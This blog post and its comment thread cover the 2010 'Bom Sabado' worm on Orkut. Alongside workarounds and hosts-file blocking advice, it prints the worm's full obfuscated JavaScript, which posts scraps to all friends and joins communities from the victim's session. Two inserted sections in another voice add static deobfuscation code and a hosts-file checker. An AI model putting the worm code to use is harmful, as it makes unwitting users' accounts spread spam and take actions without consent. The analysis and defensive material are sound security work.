In the last hour, I have received many scraps from my friends with the words “Bom Sabado!”.
Needless to say, these were automated messages from my friends, as they don’t know Portuguese. Bom Sabado means Good Saturday in Portuguese.
If you open your scrapbook, the same scrap will be sent to all your friends from your account.
So stay away from Orkut till further notice (or use m.orkut.com till then).
Update – Do not open Orkut, as per this official forum thread.
Workaround – Below is a workaround posted by Arikarin. Use at your own risk. I didn’t try it.
A way to get rid of this, and even to change your password if you want to, is:
- Clear your cookies/cache; then you may get an ‘Automated Query’ message. Don’t worry about it.
- Just log out from your account. If you don’t know the logout link, here it is: http://www.orkut.co.in/GLogin?cmd=logout
- After that, just go to the settings page; or, better, switch to the ‘OLDER VERSION’ of Orkut and try resetting your password. 🙂
You can use the older version of Orkut or simply the mobile version at m.orkut.com! I used m.orkut.com only!
Update – The above thread also shows this link – http://tptools.org/worm.js#%3Cwbr%3E#:1
The code responsible for the attack is pasted below, as it will soon be gone from the above URL! 😉
var _0x37a1=["x4Dx69x63x72x6Fx73x6Fx66x74x2Ex58x4Dx4Cx48x74x74x70","x50x4Fx53x54x5Fx54x4Fx4Bx45x4Ex3D","x43x47x49x2Ex50x4Fx53x54x5Fx54x4Fx4Bx45x4E","x26x73x69x67x6Ex61x74x75x72x65x3D","x50x61x67x65x2Ex73x69x67x6Ex61x74x75x72x65x2Ex72x61x77","x50x4Fx53x54","x53x63x72x61x70x62x6Fx6Fx6Bx3F","x6Fx70x65x6E","x43x6Fx6Ex74x65x6Ex74x2Dx54x79x70x65","x61x70x70x6Cx69x63x61x74x69x6Fx6Ex2Fx78x2Dx77x77x77x2Dx66x6Fx72x6Dx2Dx75x72x6Cx65x6Ex63x6Fx64x65x64x3B","x73x65x74x52x65x71x75x65x73x74x48x65x61x64x65x72","x26x73x63x72x61x70x54x65x78x74x3D","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","x26x75x69x64x3D","x26x41x63x74x69x6Fx6Ex2Ex73x75x62x6Dx69x74x3Dx31","x73x65x6Ex64","x47x45x54","x52x65x71x75x65x73x74x46x72x69x65x6Ex64x73x3Fx72x65x71x3Dx66x6Cx26x75x69x64x3D","x75x69x64","x26x6Fx78x68x3Dx31","x77x68x69x6Cx65x20x28x74x72x75x65x29x3Bx20x26x26x26x53x54x41x52x54x26x26x26","","x72x65x70x6Cx61x63x65","x72x65x73x70x6Fx6Ex73x65x54x65x78x74","x43x6Fx6Dx6Dx75x6Ex69x74x79x4Ax6Fx69x6Ex3Fx63x6Dx6Dx3D","x26x41x63x74x69x6Fx6Ex2Ex6Ax6Fx69x6Ex3Dx31","x31x30x36x36x39x38x38x30x38","x36","x35x35x38x34x39x34","x31x30x36x36x39x38x36x32x38","x31x30x36x36x39x31x33x34x31","x76x61x72x20x66x72x69x65x6Ex64x73x20x3Dx20","x3B","x6Cx69x73x74","x64x61x74x61","x69x64"];function createXMLHttpRequest(){try{return new XMLHttpRequest();} catch(e){return new ActiveXObject(_0x37a1[0]);} ;} ;var data=_0x37a1[1]+encodeURIComponent(JSHDF[_0x37a1[2]])+_0x37a1[3]+encodeURIComponent(JSHDF[_0x37a1[4]]);function sendScrap(_0x7c2bx4){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[11]+encodeURIComponent(_0x37a1[12])+_0x37a1[13]+_0x7c2bx4+_0x37a1[14]);} ;function requestFriends(){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[16],_0x37a1[17]+JSHDF[_0x37a1[18]]+_0x37a1[19],false);_0x7c2bx5[_0x37a1[15]](null);return (_0x7c2bx5[_0x37a1[23]])[_0x37a1[22]](_0x37a1[20],_0x37a1[21]);} ;function joinCMM(_0x7c2bx8){var _0x7c2bx5=createXMLHttpRequest();_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[24]+_0x7c2bx8,false);_0x7c2bx5[_0x37a1[10]](_0x37a1[8],_0x37a1[9]);_0x7c2bx5[_0x37a1[15]](data+_0x37a1[25]);} ;joinCMM(_0x37a1[26]);joinCMM(_0x37a1[27]);joinCMM(_0x37a1[28]);joinCMM(_0x37a1[29]);joinCMM(_0x37a1[30]);eval(_0x37a1[31]+requestFriends()+_0x37a1[32]);for(x in friends[_0x37a1[34]][_0x37a1[33]]){uid=(friends[_0x37a1[34]][_0x37a1[33]][x]);sendScrap(uid[_0x37a1[35]]);} ;
9 Comments
For everyone whose Orkut account has been affected by the ‘bom sabado’ worm…
The worm injects a hidden iframe containing a malicious JavaScript, http://tptools.org/worm.js [do not click this], which steals the user cookie that contains the password in an encoded form. So the attacker does not get to know your plaintext password, but can log in using your credentials by impersonating you with the cookie to fool the identification system. So a trivial solution is to disable JavaScript; another solution is to disable iframes; or you can take an advanced measure by blocking the domain http://tptools.org/ by editing your hosts file and redirecting it to a safe address, say 127.0.0.1.
Go to C:\windows\system32\drivers\etc\
There is a file named ‘hosts’. By default it is read-only. Go to its properties and uncheck the tickmark beside read-only.
Edit it with your favourite editor.
Add this line at the end of it:
127.0.0.1 tptools.org
Save it, and then restart your network interface (in simple words, just reconnect your internet connection) and bingo!! The worm’ll be useless.
Hope this helps..
How can you be sure that the js file steals cookies? I decoded the obfuscated JS and couldn’t find any cookie stealing there! I mean, no JSON request with your cookie as a GET parameter! What it does is initiate some AJAX requests to the Scrapbook, CommunityJoin etc. URLs and post the data to scrap and join the community…
@Rahul: What do you think about this? I really don’t think our cookie is by any means getting fetched!
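The pasted script above uses the common “hex string array” obfuscation: one array (`_0x37a1`) of `\x`-escaped strings, and every sensitive name or URL fragment in the body is referenced by index into it. The following is an added example, not code from the post or from either commenter, showing how an analyst rewrites such a script into readable form statically, without ever executing it. It runs on a constructed four-string sample written in the same style (the sample is not the worm), and the names `decodeEscapes`, `extractStringArray` and `deobfuscate` are my own.

```javascript
// Added example (not the worm's code and not from the post's commenters):
// static deobfuscation of the "hex string array" pattern. The input is never
// executed; it is rewritten textually so an analyst can read what it touches.

// Constructed sample written in the worm's style (four strings, one function).
const SAMPLE = String.raw`var _0xab12=["\x6F\x70\x65\x6E","\x50\x4F\x53\x54","\x53\x63\x72\x61\x70\x62\x6F\x6F\x6B\x3F","\x73\x65\x6E\x64"];function go(){var r=new XMLHttpRequest();r[_0xab12[0]](_0xab12[1],_0xab12[2],false);r[_0xab12[3]](null);}`;

// Turn "\x6F" / "\u006F" escapes into the characters they stand for.
function decodeEscapes(s) {
  return s
    .replace(/\\x([0-9A-Fa-f]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\u([0-9A-Fa-f]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Locate `var _0x....=[ ... ];`, return its name, its decoded strings and where it ends.
function extractStringArray(source) {
  const m = source.match(/var\s+(_0x[0-9A-Fa-f]+)\s*=\s*\[([\s\S]*?)\];/);
  if (!m) throw new Error("no hex string array found");
  const [, name, body] = m;
  const strings = [];
  const literal = /"((?:[^"\\]|\\.)*)"/g; // double-quoted literals, escaped quotes allowed
  let hit;
  while ((hit = literal.exec(body)) !== null) strings.push(decodeEscapes(hit[1]));
  return { name, strings, end: m.index + m[0].length };
}

// Replace every `_0x....[N]` with the decoded literal, then turn obj["ident"] into obj.ident.
function deobfuscate(source) {
  const { name, strings, end } = extractStringArray(source);
  const ref = new RegExp(name + "\\[(\\d+)\\]", "g");
  let code = source.slice(end).replace(ref, (whole, idx) => {
    const i = Number(idx);
    return i < strings.length ? JSON.stringify(strings[i]) : whole; // leave out-of-range refs alone
  });
  code = code.replace(/\["([A-Za-z_$][\w$]*)"\]/g, ".$1");
  // Strings that look like request paths or query fragments are the quickest triage indicators.
  const endpoints = strings.filter((s) => /[/?&=]/.test(s));
  return { name, strings, endpoints, code };
}

console.log(deobfuscate(SAMPLE).code);
```

Applied to the pasted code, the same substitution turns a call such as `_0x7c2bx5[_0x37a1[7]](_0x37a1[5],_0x37a1[6],false)` into `open("POST","Scrapbook?",false)` on an XMLHttpRequest (indices 7, 5 and 6 of the array decode to `open`, `POST` and `Scrapbook?`), which is consistent with the commenter’s reading that the script posts scraps and joins communities with the victim’s own session rather than exfiltrating a cookie. Reading the decoded strings first, before running anything, is the habit this example is meant to show.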
Better use fb lol 😛
If you visited the Orkut page after the worm attack then immediately clear cache, cookies… and change your password. Done! Now you are safe… thank you…
I have stopped Orkuting long back, only Facebook. But it looks like all social media may get infected; found this: http://www.bomsabado.com
The bug has been fixed… for sure… have a look:
http://bit.ly/etgfixed 😀
Am I safe? I got two Bom Sabado scraps… I didn’t do anything, and don’t see any automated communities joined… Later, when I opened Orkut, I checked my scrapbook and Bom Sabado was gone..
So am I affected? Do I need to change my password? I used the Google account password to log in to Orkut.
Hi Dan,
The issue seems to be fixed. I also opened Orkut today (accidentally) but it did no harm.
I guess it’s the right time to move to Facebook! 😉
Bom Sabado is spreading like hell,
so whoever is infected, first clear your history and cache
or follow the following steps.
Bom Sabado is spreading fast in Orkut. Things you should do to avoid getting infected —
Don’t open your scrapbook at all. Disable JavaScript in your browser, then open your hosts file with Notepad:
Windows 95/98/Me c:\windows\hosts
Windows NT/2000/XP Pro c:\winnt\system32\drivers\etc\hosts
Windows XP Home c:\windows\system32\drivers\etc\hosts
Win 7 – C:\windows\system32\drivers\etc\hosts
Add this code at the end:
127.0.0.1 tptools*.*org
127.0.0.1 www*.*tptools*.*org
127.0.0.1 convites.001webs*.*com
127.0.0.1 www*.*convites.001webs*.*com
Then completely clear your history, including your cache. By the way, they say it is fixed, but do take care…
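This comment and the earlier one (the `C:\windows\system32\drivers\etc\hosts` instructions) both recommend sinkholing the script’s hosting domain in the hosts file. The following is an added example, not code from the post or from either commenter, that parses hosts-file content and checks whether a given hostname is actually sinkholed. It also flags entries that are not literal hostnames: the hosts file has no wildcard syntax, so a line written with asterisks, as `127.0.0.1 tptools*.*org` appears above, never matches a real lookup. The hosts content is constructed, and the names `parseHosts` and `isSinkholed` are my own.

```javascript
// Added example: verify that a hosts-file sinkhole entry would actually take effect.
// Not code from the post or its commenters; the hosts content below is constructed.

const HOSTS_SAMPLE = [
  "# constructed sample, modelled on the entries suggested in the comments",
  "127.0.0.1 localhost",
  "127.0.0.1 tptools.org",
  "127.0.0.1 www.tptools.org   # inline comment is ignored",
  "127.0.0.1 tptools*.*org",     // asterisks as they appear in the comment: not a hostname
  "0.0.0.0 convites.001webs.com",
].join("\n");

// Dotted-quad IPv4, or a plausible IPv6 literal.
const IPV4 = /^(25[0-5]|2[0-4]\d|1?\d?\d)(\.(25[0-5]|2[0-4]\d|1?\d?\d)){3}$/;
const IPV6 = /^[0-9A-Fa-f:]+$/;
// RFC 1123 hostname: letters, digits and hyphens in dot-separated labels; no wildcards.
const HOSTNAME = /^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$/;
const SINKHOLES = new Set(["127.0.0.1", "0.0.0.0", "::1"]);

function parseHosts(text) {
  const entries = [];   // { ip, name, line }
  const problems = [];  // reasons a line will not do what its author intended
  text.split(/\r?\n/).forEach((raw, i) => {
    const line = raw.split("#")[0].trim();      // strip comments and padding
    if (!line) return;
    const [ip, ...names] = line.split(/\s+/);
    if (!IPV4.test(ip) && !(ip.includes(":") && IPV6.test(ip))) {
      problems.push(`line ${i + 1}: '${ip}' is not an IP address`);
      return;
    }
    if (names.length === 0) problems.push(`line ${i + 1}: address without hostname`);
    for (const n of names) {
      if (!HOSTNAME.test(n)) {
        problems.push(`line ${i + 1}: '${n}' is not a literal hostname (hosts has no wildcards); it will never match a lookup`);
        continue;
      }
      entries.push({ ip, name: n.toLowerCase(), line: i + 1 });
    }
  });
  return { entries, problems };
}

// True when the first matching entry for `hostname` points at a sinkhole address.
// Resolvers typically take the first match, so an earlier real-address line would win.
function isSinkholed(hostsText, hostname) {
  const want = hostname.toLowerCase().replace(/\.$/, "");
  const hit = parseHosts(hostsText).entries.find((e) => e.name === want);
  return hit !== undefined && SINKHOLES.has(hit.ip);
}

console.log(parseHosts(HOSTS_SAMPLE).problems);
```

Run against the sample, `parseHosts` reports the asterisk line as unusable and `isSinkholed` confirms `tptools.org` and `www.tptools.org` are covered. Note what the check does not promise: a hosts entry only blocks the one name listed (each subdomain needs its own line), and it only helps while the script is still fetched from that domain.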